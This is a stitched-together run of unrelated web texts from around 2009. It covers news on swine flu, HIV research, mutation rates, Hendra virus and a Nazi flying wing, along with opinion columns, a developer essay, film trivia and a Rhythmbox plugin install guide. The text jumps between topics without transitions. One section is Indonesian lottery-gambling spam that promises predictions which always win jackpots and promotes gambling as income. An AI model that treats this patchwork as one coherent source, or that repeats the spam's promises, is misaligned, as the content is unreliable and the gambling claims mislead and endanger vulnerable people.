Just for the heck of it , we ’ll note that on this day in 1898 , Edwin Prescott patented the world ’s first roller coaster
Adlai E. Stevenson won the Democratic nomination for president on this day in 1956 .
And you know you still care .
Elvis Presley died of a coronary arrhythmia in Memphis 32 years ago today .
Babe Ruth and Bela Lugosi also died on this day , in 1948 and 1956 , respectively .
Mr. Lugosi was buried in his Dracula cape .
Poll du jour
65 percent of Americans say they are likely to get the swine - flu vaccine .
31 percent say they are unlikely to get the vaccine .
44 percent normally get a flu shot each year .
37 percent are confident that doctors are prepared to handle a flu epidemic .
46 percent say the danger of swine flu has been blown out of proportion .
30 percent say the attention is warranted ; 25 percent are unsure .
71 percent say the media has exaggerated the danger of swine flu and other diseases .
Source : A Rasmussen Reports survey of 1,000 adults conducted Aug. 4 and 5 .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
The new Honda proposal is all about a Formula Ford celebration .
The occasion of 40th birthday will happen this weekend at Road America .
The stepping - up will happen with the proposal of the new engine for the entry - level open wheeled classic .
The Kent has been using 1.6 liters since its inception and it is now time to move it down .
The weekend at Elkhart Lake saw a lot of celebrations .
There has been a huge showing off for the 2009 Fit installed in a Swift DB 1 FF chassis .
The mill is fuel injected , electronically controlled and requires less maintenance as compared to the Kent .
There has been a lot of American approving for its powerful presence and great uses .
The Sports Car Club of America , for instance , has approved of the Honda powerplant with the wholesome kit involved with it .
Here the base would include the L15A7 engine and the mounting hardware which would be selling for $ 12,000 .
The old Kent engine will probably be lingering for longer period of Formula Fords and Formula Vees .
They are still in running condition and could signal for the beginning of a whole new time frame of cars and engineering .
The Honda Performance Development Inc. has already proposed entry for the prototype debuts to be held at the 40th anniversary celebration .
Source : autoblog
Neurons can protect themselves against infection with HIV , new research has demonstrated .
They owe their hardiness to a protein called FEZ - 1 , made uniquely by neurons , and which appears to lock out the virus .
The finding raises the possibility of new treatments to thwart HIV by using gene therapy or drugs to activate production of the same protein in cells other than neurons – especially the white blood cells most vulnerable to infection .
Mojgan Naghavi of University College Dublin , Ireland , along with her colleagues Juliane Haedicke and Craig Brown , established the protective effects of FEZ - 1 by blocking production of the protein in human neurons .
When they did this , the neurons became vulnerable to infection .
Likewise , they successfully blocked the usual infections in other types of brain cells , such as microglia , by engineering them to manufacture FEZ - 1 .
Advertisement
Transport blocker ?
Next , the researchers hope to see if they can block HIV infection in white blood cells by genetically engineering them to produce FEZ - 1 .
They also hope to find out more about how FEZ - 1 blocks HIV .
“ We know FEZ - 1 blocks infection , but we need to find the basic mechanism , ” says Naghavi .
Standing for fasciculation and elongation protein zeta -1 , FEZ - 1 is known to bind to molecular “ motors ” that help to transport proteins within cells along internal tramlines known as microtubules .
Naghavi says it may be that FEZ - 1 gets in the way , blocking transport of viral proteins into the nucleus where they would multiply .
Second weapon
The only other established source of natural protection against infection is in people who ca n’t make CCR5 , a surface protein that HIV uses to gain entry to cells .
Drugs already exist to block CCR5 , and other teams are testing gene therapies to restock patients ’ blood with cells engineered to not produce CCR5 .
Sangamo Biosciences of Richmond , California , began such a trial earlier this year , using a method to disable the CCR5 gene in blood samples before returning them to patients .
The company says it is theoretically possible to activate the FEZ - 1 gene in cells vulnerable to HIV infection .
Journal reference : Proceedings of the National Academy of Sciences ( DOI : 10.1073/pnas.0900502106 )
There is a lot to be said for being humble .
As individuals we tend to admire those who are humble , the self - effacing celebrity , the quiet monk , these are the kinds of people we look up to .
We are all taught as kids that being humble is a good thing and we must all aspire to it .
As a society , however we do n’t really reward humbleness .
Recognition does n’t come to those who quietly work hard , recognition comes to those who apply for it and can then prove their greatness .
The software development world is no different , we aspire to work with stars ( it ’s human nature ) , we want to associate with those we consider great .
Nobody wants to work with quiet Joe Programmer , possibly because noone knows how awesome young Joe really is .
Yes , it ’s a bit of a dilemma .
So should you , as a developer , maintain a humble attitude or is self promotion the way to go ?
Let me ask you a question .
Have you ever thought that you were the best developer in the world ?
Perhaps after pulling an all - nighter to finish working on your latest , greatest idea , or maybe after solving that weird bug that the whole team has been trying to figure out for the last three days .
You know the feeling you get , that quiet satisfaction , that inner glow after you realize that you may have just found it , and while basking in that glow you might just entertain a though :
“ Man , I have some 1337 ( that ’s ‘ elite ’ for those who do n’t know ) skillzzz ! ” ,
but of course as soon as you think that you realize how completely ludicrous that sounds .
And then , to compensate , you shrug off the praises of your co-workers and feel a little embarrassed to be getting so much attention ,
“ It was a team effort ” ,
you say , I am just your average Joe Programmer ; no big deal .
While humbleness is admirable , I am a big believer in balance in all things .
I am perhaps not the humblest person in the world ( yeah , I can hear those who know me laughing out loud :) ) , but I try to be aware of that part of my nature and keep it in check , but at the same time I am careful not to let it go too far the other way .
I am well aware that I am not the greatest developer in the world .
I ’ve known and worked with plenty of people who were better , but that does n’t mean that I do n’t value the skills that I do have .
And that ’s the crux of it , no matter what societal pressures or your own nature might tell you , there is nothing wrong with having a healthy sense of self - worth .
You need to walk the middle ground .
There is no doubt that any non-trivial software project these days will be a team effort and there is nothing wrong with giving credit to the whole team for the successes that the project might have .
But , at the same time , you need to remember that you and every other individual are part of that team .
If you , or someone else , does something great then there is nothing wrong with acknowledging it .
Learn to give and take praise graciously , it is a very useful skill to have .
Do n’t devalue your own work , when others acknowledge it , by discounting the efforts you put into it .
Being humble is easy , it comes naturally to most of us , and being a self - promoter works ( after all , if you put yourself out there enough , someone is bound to trip over you at the very least :) ) .
But , there is no need to jump to either extreme , find a healthy balance , you will be mentally and emotionally better off for it .
Do n’t get me wrong though , you still need to keep your feet planted firmly on the ground .
Remember that Socrates quote – “ _I know nothing except the fact of my ignorance_ ” – well , that does n’t mean that you actually know nothing ( and it is also not nonsense , regardless of whether you have an IQ of 268 or not ) .
What it does mean , is that no matter how much you know , you need to always be aware that there is a lot more to learn , and that ’s one of the things that will keep you grounded ( firmly in the middle ) .
Acknowledge your successes and always keep learning and improving yourself , and next time you ask yourself :
“ Do I absolutely rock at this software development gig or what ? ” ,
examine all the facts and make an honest assessment , rather than dismissing the question as arrogant , or giving yourself a pat on the back for no reason .
Image by echiner1
Data Keluaran Togel dan Live Result Togel Tercepat
Permainan result togel online yang sudah sangat terkenal di Indonesia sejak beberapa tahun terakhir tentunya telah banyak menciptakan para ahli togel yang sudah sering memenangkan jackpot di situs togel online terpercaya .
Namun apa kamu tahu bahwa rahasia kemenangan mereka di hasilkan dari sebuah rancangan prediksi togel yang tepat dari perhitungan data togel dengan keakuratan yang tepat .
Oleh karena itu untuk menciptakan sebuah sistem prediksi yang tepat disini manzine.org berkomitmen untuk menciptakan sebuah sistem data togel paling akurat yang sudah di rincikan setiap harinya ke dalam bentuk tabel .
Dan untuk lebih mempermudah para pemain togel pemula di sini kami juga memiliki fitur statistik yang lengkap untuk memperlihatkan detail kemenangan dari setiap jenis permainan togel .
Kemudian di dalam data togel kami juga tersedia sebuah diagram serta rata rata keluaran yang akan di hitung secara otomatis dari keluaran togel 30 hari terakhir .
Nah dengan sistem ini maka wajar saja bahwa para ahli togel yang membuat prediksi togel di situs ini selalu berhasil memberikan jackpot kepada setiap pengunjung kami .
Sistem result togel yang tersedia di manzine.org juga tersedia dalam sistem live draw yang di mana artinya setiap pengeluaran togel yang di hadirkan di situs ini akan di keluarkan secara bersamaan oleh situs official pasaran masing masing .
Hal ini berhasil kami lakukan karena kamit telah mendapatkan kepercayaan untuk bekerja sama demi menghadirkan sebuah result tercepat untuk para pecinta togel .
Situs Result Togel Resmi di Indonesia Dengan Keamanan Terbaik
Sebagai sebuah situs result togel yang dapat di percaya oleh jutaan visitor setiap harinya tentunya sebuah keamanan dan kelancaran merupakan hal yang mutlak .
Oleh karena itu Bersama dengan para
It terbaik di Indonesia di sini manzine.org berkomitmen lebih untuk memberikan sebuah situs keluaran togel dengan server yang sangat kuat dan bermutu .
Untuk menjaga hal tersebut di sini kami juga memberikan sebuah sistem keamanan terbaik untuk mencegah setiap pengunjung kami mengalami hal yang tidak di inginkan .
Di sini server kami di lengkap kemanan terbaik dengan tambahan sistem HTTPS atau secured connection yang bisa anda check langsung di bagian atas kiri URL kami yang di lengkapi icon gembok yang menunjukkan amannya situs kami .
Gunakan Pengeluaran Togel Di Situs Togel Terpercaya Hasilkan Banyak Uang
Setelah beberapa penjelasan di atas tentang kelebihan manzine situs pengeluaran togel terbaik di Indonesia pastinya kamu sudah tahu dimana kamu harus melihat result togel yang paling cepat dan aman .
Namun Sekarang admin juga mau kasih sedikit tips yang terbaik untuk memanfaat kan togel online sebagai sumber mata pencaharian mu .
Pertama dalam bermain judi togel tentunya selain mendapatkan situs keluaran togel kamu juga membutuhkan yang Namanya situs togel online yang dapat di percaya .
Cara mencarinya pun sangat gampang yaitu kamu harus dengan cermat mengamati berapa pemain online setiap harinya dan apakah bonus bonus yang di berikan terlihat menjebak atau tidak .
Kemudian kamu bisa melakukan double check dengan melihat forum serta social media yang di penuhi nilai positive atau tidak .
Nah jika sudah yakin kamu tinggal memanfaatkan setiap data togel kami untuk menjebol setiap jackpot di situs togel dengan prediksi mutakhir .
Dan untuk kamu yang malas mencari situs togel terpercaya di sini kami juga menyediakan beragam situs judi online terpercaya yang bekerja sama dengan situs kami .
Dengan adanya kerja sama ini kami juga sudah melakukan pengecheckan selama 2 bulan untuk memastikan setiap partner kami merupakan situs terpercaya demi menjaga nama baik situs kami .
Oleh karena itu anda tidak perlu ragu bermain di setiap situs yang kami iklankan atau kami pajang di dalam list situs judi terpercaya .
Published online 27 August 2009 | Nature | doi:10.1038/news.2009.864
News
Next - generation sequencing provides the most accurate estimate to date .
How quickly is your DNA mutating ?
Punchstock
Every time human DNA is passed from one generation to the next it accumulates 100 – 200 new mutations , according to a DNA - sequencing analysis of the Y chromosome .
This number — the first direct measurement of the human mutation rate — is equivalent to one mutation in every 30 million base pairs , and matches previous estimates from species comparisons and rare disease screens .
The British - Chinese research team that came up with the estimate sequenced ten million base pairs on the Y chromosome from two men living in rural China who were distant relatives .
These men had inherited the same ancestral male - only chromosome from a common relative who was born more than 200 years ago .
Over the subsequent 13 generations , this Y chromosome was passed faithfully from father to son , albeit with rare DNA copying mistakes .
The researchers cultured cells taken from the two men , and using next - generation sequencing technologies found 23 candidate mutations .
Then they validated twelve of these mutations using traditional sequencing techniques .
Eight of these mutations , however , had arisen in their cell - culturing process , which left just four genuine , heritable mutations .
Extrapolating that result to the whole genome gives a mutation rate of around one in 30 million base pairs .
" It was very reassuring that our application of the new sequencing technologies seems to give a reliable result and that the number we 've been using for the mutation rate is pretty much the right one , " says Chris Tyler - Smith of the Wellcome Trust Sanger Institute in Hinxton , UK , who led the study , published today in Current Biology1 .
Tyler - Smith says that direct measurement of the mutation rate can be used to infer events in our evolutionary past , such as when humans first migrated out of Africa , more accurately than previous methods .
But before that 's possible , researchers will need a more precise estimate , notes Laurent Duret , an evolutionary biologist at the University of Lyon in France .
" The confidence interval for the mutation rate is still quite wide , " he says .
Sequencing more pairs of Y chromosomes from distant male cousins in other families should provide a more robust measurement and reveal how mutation rates vary between individuals , Duret adds .
ADVERTISEMENT
Most of the Y chromosome does n't mix with any other chromosomes , which makes estimating its mutation rate easier .
But the mutation rate might be somewhat different on other chromosomes , points out Adam Eyre - Walker , an evolutionary biologist at the University of Sussex in Brighton , UK .
Other projects that involve sequencing parents and their offspring , such as the 1000 Genomes Project , should start to illuminate how DNA changes across the rest of the genome .
" I 'm sure this is just the first of many papers that will be doing the same sort of thing , " says Tyler - Smith .
A vet who was exposed to Hendra virus at a central Queensland horse stud has tested positive to the potentially deadly illness .
The man was admitted to Rockhampton Base Hospital yesterday after showing symptoms .
He was transferred to Brisbane 's Princess Alexandra Hospital overnight in a critical condition .
The vet had treated two horses with the virus that died at a Cawarral property on August 7 and 8 .
Three other people were also exposed to the virus but Queensland 's chief health officer , Jeannette Young , says there is no reason to suspect the trio have the virus .
" The other three , at this point , we do n't believe have the infection .
If any of them become unwell we 've asked them to represent for testing , " she said .
The owner of the stud , John Brady , said the situation was " devastating " .
" He's ( the vet ) been admitted into the Princess Alexandra Hospital to be monitored , " Mr Brady said .
" It 's devastating for all of us .
He 's in a critical condition .
" I 'm going to have a meeting with all of my staff to discuss their symptoms and whether they too should go to the PA . "
Hendra virus is potentially deadly for infected people .
Brisbane vet Ben Cunneen died after contracting Hendra from a horse 12 months ago .
- ABC/AAP
Hitler 's stealth bomber :
How the Nazis were first to design a plane to beat radar
With its smooth and elegant lines , this could be a prototype for some future successor to the stealth bomber .
But this flying wing was actually designed by the Nazis 30 years before the Americans successfully developed radar - invisible technology .
Now an engineering team has reconstructed the Horten Ho 2 - 29 from blueprints , with startling results .
Blast from the past :
The full - scale replica of the Ho 2 - 29 bomber was made with materials available in the 40s
Futuristic :
The stealth plane design was years ahead of its time
It was faster and more efficient than any other plane of the period and its stealth powers did work against radar .
Experts are now convinced that given a little bit more time , the mass deployment of this aircraft could have changed the course of the war .
The plane could have helped Adolf Hitler win the war
First built and tested in the air in March 1944 , it was designed with a greater range and speed than any plane previously built
and was the first aircraft to use the stealth technology now deployed by the U.S. in its B - 2 bombers .
Thankfully Hitler ’s engineers only made three prototypes , tested by being dragged behind a glider , and were not able to build them on an industrial scale before the Allied forces invaded .
From Panzer tanks through to the V - 2 rocket , it has long been recognised that Germany ’s technilowcal expertise during the war was years ahead of the Allies .
But by 1943 , Nazi high command feared that the war was beginning to turn against them , and were desperate to develop new weapons to help turn the tide .
Nazi bombers were suffering badly when faced with the speed and manoeuvrability of the Spitfire and other Allied fighters .
Hitler was also desperate to develop a bomber with the range and capacity to reach the United States .
In 1943 Luftwaffe chief Hermann Goering demanded that designers come up with a bomber that would meet his ‘ 1,000 , 1,000 , 1,000 ’ requirements – one that could carry 1,000kg over 1,000 km flying at 1,000 km /h .
A full scale replica of the Ho 229 bomber made with materials available in the 1940s at prefilght
A wing section of the stealth bomber .
The jet intakes were years ahead of their time
Two pilot brothers in their thirties , Reimar and Walter Horten , suggested a ‘ flying wing ’ design they had been working on for years .
They were convinced that with its drag and lack of wind resistance such a plane would meet Goering ’s requirements .
Construction on a prototype was begun in Goettingen in Germany in 1944 .
The centre pod was made from a welded steel tube , and was designed to be powered by a BMW 003 engine .
The most important innovation was Reimar Horten ’s idea to coat it in a mix of charcoal dust and wood glue .
Vengeful : Inventors Reimar and Walter Horten were inspired to build the Ho 2 - 29 by the deaths of thousands of Luftwaffe pilots in the Battle of Britain
The 142 - foot wingspan bomber was submitted for approval in 1944 , and it would have been able to fly from Berlin to NYC and back without refueling , thanks to the same blended wing design and six BMW 003A or eight Junker Jumo 004B turbojets
He thought the electromagnetic waves of radar would be absorbed , and in conjunction with the aircraft ’s sculpted surfaces the craft would be rendered almost invisible to radar detectors .
This was the same method eventually used by the U.S. in its first stealth aircraft in the early 1980s , the F - 117A Nighthawk .
The plane was covered in radar absorbent paint with a high graphite content , which has a similar chemical make - up to charcoal .
After the war the Americans captured the prototype Ho 2 - 29s along with the blueprints and used some of their technological advances to aid their own designs .
But experts always doubted claims that the Horten could actually function as a stealth aircraft .
Now using the blueprints and the only remaining prototype craft , Northrop - Grumman ( the defence firm behind the B - 2 ) built a fullsize replica of a Horten Ho 2 - 29 .
Luckily for Britain the Horten flying wing fighter - bomber never got much further than the blueprint stage , above
Thanks to the use of wood and carbon , jet engines integrated into the fuselage , and its blended surfaces , the plane could have been in London eight minutes after the radar system detected it
It took them 2,500 man-hours and $ 250,000 to construct , and although their replica cannot fly , it was radar - tested by placing it on a 50ft articulating pole and exposing it to electromagnetic waves .
The team demonstrated that although the aircraft is not completely invisible to the type of radar used in the war , it would have been stealthy enough and fast enough to ensure that it could reach London before Spitfires could be scrambled to intercept it .
‘ If the Germans had had time to develop these aircraft , they could well have had an impact , ’ says Peter Murton , aviation expert from the Imperial War Museum at Duxford , in Cambridgeshire .
‘ In theory the flying wing was a very efficient aircraft design which minimised drag .
‘ It is one of the reasons that it could reach very high speeds in dive and glide and had such an incredibly long range . ’
The research was filmed for a forthcoming documentary on the National Geographic Channel .
FEDERAL HEIGHTS —
A man claims a police officer broke his arm , left the scene without getting him help and then returned after the man called 911 — only to deny seeing him earlier .
Federal Heights police Officer Mark Magness , 45 , who has been with the department one year , is now under a joint criminal and internal - affairs investigation but remains on the job .
Dennis Discua , 34 , said he was walking home with his 3 - year - old son after watching July Fourth fireworks on a nearby hill .
Witnesses said Magness , who was on routine patrol , began to round up some of the spectators to ask them about reports of illegal fireworks in the area .
When Magness approached Discua , the man pointed to his house a few feet away and said , “ I live there . ”
That ’s when Discua and five witnesses say Magness put out his foot , twisted Discua ’s arm back and threw him on the ground .
Discua tumbled 20 feet down a concrete culvert , stopping when he hit a curb below , witnesses said .
His head and ear were bleeding , his shoulder was scratched and his arm was dislocated and fractured .
“ I could see the bone was popping out of his elbow , ” said neighbor Zach Davenport , 19 .
Discua says he then showed the officer his injury .
“ He got his flashlight and looked and sees my arm , ” Discua said .
“ Then he just said to my neighbors and me , ‘ Go home . ’
And then he just left . ”
Neighbors helped Discua to his front porch and then dialed 911 .
The dispatcher sent the nearest officer — Magness — who returned and pretended not to know what happened , according to witnesses .
“ The cop came down the street , and he got out of his car , and he said , ‘ What happened ? ’
And he ’s playing it off like it was n’t him , ” said neighbor Frank Brandin .
Magness can be heard on a dispatch tape when he was sent back for the second time referring to Discua as someone he met earlier in the night .
He declined to talk to 9 News , saying that he can’t comment because it is an ongoing investigation .
Magness did deny pushing Discua down the hill or breaking his arm .
The witnesses and Discua said they are sure that the officer who injured Discua also responded to the call .
“ Unless he ’s got a twin brother that works for Federal Heights as a police officer as well and was on the job on the same night , it was him , ” Brandin said .
The witnesses and Discua have filed police reports with the Federal Heights Police Department .
Discua has hired an attorney .
This is unbelievable .
I 've seen people try and find racist undertones in harmless entertainment before , but The Houston Chronicle 's Willie Jefferson takes home the prize for making the most ridiculous and convoluted racism link in history .
According to him , Left 4 Dead 2 is " disturbing " because " several " of the zombies are African - American .
Yep , that 's right -- you can't even have ONE black zombie without somebody crying racism .
" I am disturbed by the growing trend of racist undertones that are cropping up in video games , " writes Jefferson .
" One of the games that comes to mind is Left 4 Dead 2 ...
Set in New Orleans , players will have to fight their way through hordes of zombies - with several of them who appear to be African - Americans .
When I saw the first trailer for the game , all I could think about was Hurricane Katrina and the aftermath . "
So let me get this straight ...
Valve is now wrong to include a single black zombie in the game ?
I literally cannot believe I just read that someone is upset over " several " black zombies -- not an entire army of black ones , just several black ones amidst a bunch of white ones .
Has society really gone so f*cking stupid that we can't do anything anymore without the race card being played ?
Jefferson also attacks Call of Juarez : Bound in Blood for daring to feature a Confederate officer as the main hero : " The Confederacy , as far as I am concerned , wanted to keep their cheap slave labor and the like .
I can not stand the Confederate flag ...
To me , the flag represents hate -- and offends me and many others to no end .
[ It ] made me wonder how much research Ubisoft did for this game ... "
I think society has really gone too far with these pathetic attempts to find racism in everything .
When you 're saying L4D2 is racist because some black people happen to be IN it , and when you 're saying a game is racist for not automatically portraying every single Confederate soldier as a babyraping Nazi ( which is , itself , a rather bigoted viewpoint ) , then you 've lost your grip on reality .
Jefferson ought to be ashamed of himself for obscuring real issues of racism with this " cry wolf " nonsense .
I have now learned not to question Sy Hersh .
When I heard he was working on a story on an " executive assassination ring " run by Dick Cheney , I told our audience to be skeptical .
Come on , bounds of reason .
Assassination teams , really ?
Well , it turns out , really !
No , really !
But I still do n't get it .
If these teams are meant to kill or capture senior Al Qaeda operatives , what 's the big deal ?
Are n't we trying to do that already ?
Is that really out of the ordinary ?
And what difference does it make if you kill people by missiles fired out of drones or you kill them at close range ?
So , there are two possibilities here .
One is that the CIA has gotten too risk averse .
I think they should obviously have highly - trained paramilitary teams ready to take out our enemies .
Is this something they should use often or without going through all of the proper channels ?
Of course , not .
Look at how many times we were wrong in our extraordinary rendition program .
We only kidnapped and tortured those guys .
At least , we did n't terminate them with our hit squads .
But given the right circumstances , we should have hit squads .
For example , if we went to war with North Korea ( let 's hope to God that never happens ) , I sure hope we got a team that 's going to parachute into Pyongyang and try to find Kim Jong - il .
If we do n't , then I think we are being too cautious and not utilizing our entire arsenal .
Of course , this does n't mean you send that team if there is no war .
And there 's the rub with assassination teams - once you start playing with them , it 's hard to put them down .
But we are at war with Al Qaeda and if someone is n't trained to take out Osama bin Laden at close range at a moment 's notice , then we 're doing something wrong .
Now , there is a second possibility .
It 's not that controversial to have a team ready to kill or capture Bin Laden or other senior Al Qaeda operatives .
It is controversial to have a team ready to kill ... other targets .
Remember , the Bush administration told us that their warrantless wiretapping program was aimed only at Al Qaeda affiliates and we found out that was nowhere near the case .
There were guys listening in on phone sex calls of innocent Americans by the time we found out about that program .
So , I have to ask what I previously thought unimaginable .
Who exactly were the assassination squads supposed to assassinate ?
I really do n't want to get into crazy speculation .
I certainly do n't think this program would be turned inward as well .
And it is eminently possible that it was just aimed at senior Al Qaeda guys , as I explained above .
But given the history of the Bush administration and what has been less than honest explanations in the past , one has to ask - who were the targets under consideration ?
If as a journalist , you do n't ask this question , then you 're not doing your job .
It would be hard to argue this is n't relevant .
Dick Cheney hid this program from Congress ( under what authority could he order a program like this in the first place ? ) and ordered the CIA to lie about it to the rest of the government ( including large portions of the FBI and CIA ) .
Is it not conceivable that as Cheney worked the " dark side , " he gave other unimaginable orders ?
Did Bush even know what orders Cheney was giving ?
Did Bush know who was on the assassination list ?
If they had a program , they had a list , right ?
Who 's on the list ?
If they bothered to have assassination squads , it seems inconceivable that they did n't make a list .
Does anyone have that list ?
Where is it now ?
And who 's on it ?
Watch The Young Turks Here
_______
Trivia
The film started life as a ten - minute short called " Roast of the Day " , which started shooting in 1981 .
The story concerned Giles ( Craig Smith ) , an aid worker who comes to the small coastal town of Kaihoro on collection day .
The young man encounters a psychopath named Robert who then pursues him .
Giles escapes the madman and reaches an old heritage estate where he tries to contact the authorities .
However , the same clan of cannibalistic psychos that Robert is from occupies the house and captures Giles .
In an ironic twist the aid worker is later cooked up to relieve the famine of the cannibals .
Along the way Peter Jackson added the " special forces " team that would be sent to rescue Giles , but in this early version the " boys " would turn out to be cannibals as well ( they staged the whole thing because they like to play with their food ) .
When it came time for Jackson to finally edit the film together he found that he had nearly 50 minutes ' worth of usable footage .
So with its length and being inspired by the 16 mm efforts of Sam Raimi 's Tanz der Teufel ( 1981 ) , Jackson continued shooting to make the movie a full - length feature .
See more
Hillary Clinton and South African President Jacob Zuma .
By Firoze Manji
August 6 , 2009 -- International media attention is focused on the August 3 - 14 visit of the US Secretary of State , Hillary Clinton , to seven countries in Africa .
Judging by the behaviour of representatives of many African governments , there are great expectations that this visit –- following so closely after US President Barack Obama 's two earlier visits to Egypt and Ghana this year -– holds out vast hope for Africa .
But what is the significance of Clinton ’s visit ?
Does it really hold out hope for Africa ?
There are three dimensions to this visit : The African Growth and Opportunity Act ( AGOA ) ; oil and natural resource exploitation ; and security .
In all three dimensions , the focus is on providing guarantees for US corporate interests .
As Steve Ouma Akoth explains in Pambazuka News ( http://www.pambazuka.org/en/category/features/58271), despite its name as the African Growth and Opportunity Act , the principal beneficiaries of what is exclusively a US government act are US corporations that will gain from the exploitation of cheap African labour .
Yes , the latter will get ``jobs ' ' , but pitifully paid jobs .
And in an environment where there is little choice , African workers are forced to accept that being exploited is a better option than not being exploited by US corporate interests .
With China , India , Brazil , Saudi Arabia , Russia and other emerging powers competing for access to Africa 's natural resources , including oil , there is little doubt that the US belligerence during the era of the Bush junta has potentially created conditions favourable to the new players .
Clinton 's visit is directly related to seeking to protect and advance US corporate interests in oil and natural resource exploitation in Africa .
Angola provides some 7 per cent of US oil imports , closely followed by Nigeria , both countries part of Clinton ’s itinerary .
Cosying up to South Africa -– both because of its wealth and because it has become a serious economic power in the rest of the continent -– is hardly surprising .
And that brings us to the third dimension .
This visit is also about negotiating for AFRICOM ( US miltary 's African Command ) to have greater presence in Africa .
It is hardly a coincidence that just as Clinton begins her junket , so AFRICOM announces its MEDFLAG [ joint US - Swazi military excerise ] initiative in Swaziland .
As Thomas Friedman once put it : `` The hidden hand of the market will never work without a hidden fist .
McDonald ’s cannot flourish without McDonnell Douglas …
And the hidden fist that keeps the world safe for Silicon Valley ’s technologies to flourish is called the US Army , Air Force , Navy , and Marine Corps . ''
And once again , something that is entirely a US creation is marketed as something putatively African : ``African Command ' ' does not mean Africans in command , just as the African Growth and Opportunity Act is not about growth and opportunity for Africa , but rather for US corporations .
Security is high on the agenda .
But it is the security of US corporate interests that is at the heart of Clinton 's agenda , not human security , the security of ordinary people to thrive , to be secure that their children will be safe from impoverishment , secure in the knowledge that they will be able to work ; and working , to transform their world to serve the interests of humanity , not the narrow interests of a minority in the North .
[ Firoze Manji is editor in chief of Pambazuka News . ]
The PS3 Slim has been somewhat of a myth these past months .
With new stories about retailers leaking information , it ’s hard to get it out of one ’s mind .
Now , a cast of bloggers have taken it upon themselves to tell the true , terrifying story … of the PS3 Slim .
[ youtube ]
http://www.youtube.com/watch?v=yw_wWCHwOmc[/youtube]
Rhythmbox ships with many popular plug-ins already installed - such as lastfm scrobble support , visualizations , DAAP music sharing and iPod support , but you can expand Rhythmbox 's features further with third party plug-ins that range from a 10 band graphic equalizer to simple ' jump to now playing ' hacks .
Enable 3rd Party Plugins
To install Third - Party plug-ins you will need to create a ‘ plugins ’ folder for Rhythmbox .
Open a Terminal and type :
mkdir ~/.gnome2/rhythmbox / plugins /
That ’s it !
You ’re all set to start installing 3rd party plugins !
‘ Desktop Cover ’
Desktop - art shows the current song cover and track details on your desktop , as well as being a ‘ control ’ allowing you to pause and skip between tracks .
( Normal mode and control display on mouse - over )
Installation
Open a terminal and copy & paste the following : -
cd $ HOME/.gnome2/rhythmbox / plugins /
svn co http://nedrebo.org/svn/rhythmbox/desktop-art
[ See Below ]
Restart Rhythmbox and enable the desktop - art from the ‘ Plugins ’ menu .
* The site hosting the plugin seems to be down , but you can download the pluging from : -
You just need to - double click on it and install .
' Jump to playing '
This will add a menu entry and button that will ‘ jump ’ to the currently playing track when used .
Download http://www.stevenbrown.ca/blog/files/2008/10/jump-to-playing-0.3.1.tar.gz
Extract the downloaded folder to ~/.gnome2/rhythmbox / plugins
Restart Rhythmbox Enable plugin via edit > plug-ins
Enable the plugin via the plugins menu .
‘ Open Folder '
In iTunes , right clicking any track track and selecting ' Open File In Explorer / Finder ' quickly helps you locate or access that file or it 's folder .
Handy if you have a stray track that you want to move elsewhere but you can't find !
' Open Folder ' plugin brings this helpful hack to Rhythmbox .
Download rb-open - folder-0.4.tar.gz
E xtract folder to ~ /.gnome2/rhythmbox / plugins
Restart Rhythmbox
Enable plugin via edit > plugins
Now when you right click a track you will see an option to ' open containing folder ' .
Last .
FM Queue
Queues the next song based on Last .
FM recommendations relating to the currently playing track .
It adds a button to your control bar allowing you to toggle it on and off .
Download http://airmindprojects.googlecode.com/files/lastfm_queue_0.3.tar.bz2
Extract folder to ~ /.gnome2/rhythmbox / plugins
Restart Rhythmbox
Enable plugin via edit > plugins
Alarm Clock
Give Alarm Clock functionality to Rhythmbox with this plugin !
You can set the time to be woken , the volume , how long the music is on for , etc .
Installation
Open a terminal and type : -cd $ HOME/.gnome2/rhythmbox / plugins /
svn co http://nedrebo.org/svn/rhythmbox/alarm-clock
Restart Rhythmbox and then enable the plugin .
Music Player Applet Okay so this is n’t actually a Rhythmbox plugin , but it ’s very useful to use with Rhythmbox – and any other music player supported by it .
( I.E. pretty much every one ) .
Firefox users : apt:music - applet
Or use ‘ sudo apt - get install music - applet ’ in a terminal .
Once you ’ve installed it , add it to your panel by right clicking > add applet > music applet .
Then right - click on it and select your player and which controls you ’d like displayed .
( For Example , In the image above , i have disabled the ‘ ratings ’ . )
More
For a full list of third party plug-ins check out the list @ http://live.gnome.org/RhythmboxPlugins/ThirdParty
On the right hand , just a turn on the right , time shown under the skin .
Electronic tattoo , radio control and synchronized from an outside control device .
No batteries needed , it 's just working with body movements .
An improved electronic chip that in future could lead as well for contact less payments and who knows what .
Prosecutors said they no longer felt they were able to win the case
The US has moved to dismiss a case against two former pro-Israel lobbyists accused of conspiring to pass defence secrets to unauthorised persons .
Prosecutors had said Steve Rosen and Keith Weissman intended to disclose the details to Israel and to the media .
But the government said it was unlikely to win the case and that trial could exposed classified information .
Critics said the case had been a bid to criminalise commonplace exchanges between journalists and politicians .
Mr Rosen and Mr Weissman , formerly working for the influential American Israel Public Affairs Committee ( Aipac ) , were the first lobbyists to be charged under the Espionage Act of 1917 .
Acting US attorney Dana Boente said that when the charges were first filed , " the government believed it could prove this case beyond a reasonable doubt based on the statute " .
But he said that after the Judge TS Ellis demanded that prosecutors proved the men intended to harm the US with their actions , there was now a " diminished likelihood the government will prevail at trial " .
In the statement to the court , Mr Boente asked that they dismiss the indictment given the " inevitable disclosure of classified information that would occur at any trial in this matter " .
' Hardship ' Lawyers for the two men said the decision was " a huge victory for the First Amendment " , which constitutionally guarantees the right to free speech in the US .
The Associated Press reported Baruch Weiss as saying that a prosecution victory would have set a precedent for journalists seeking sensitive information to face possible prosecution .
But Mr Weiss said the four - year process had been a " tremendous hardship " for the two men , who were dismissed by Aipac in 2005 .
Former defence analyst Lawrence Franklin was sentenced to 12 years and seven months in jail in 2006 for disclosing classified information to Mr Rosen and Mr Weissman .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
